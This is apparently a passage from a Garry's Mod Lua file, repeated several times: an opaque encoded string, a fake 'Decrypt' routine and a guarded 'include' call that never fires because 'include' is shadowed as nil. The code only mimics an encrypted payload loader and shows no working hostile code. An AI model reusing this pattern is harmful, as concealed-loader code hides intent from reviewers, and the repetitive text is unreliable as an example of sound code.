	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil

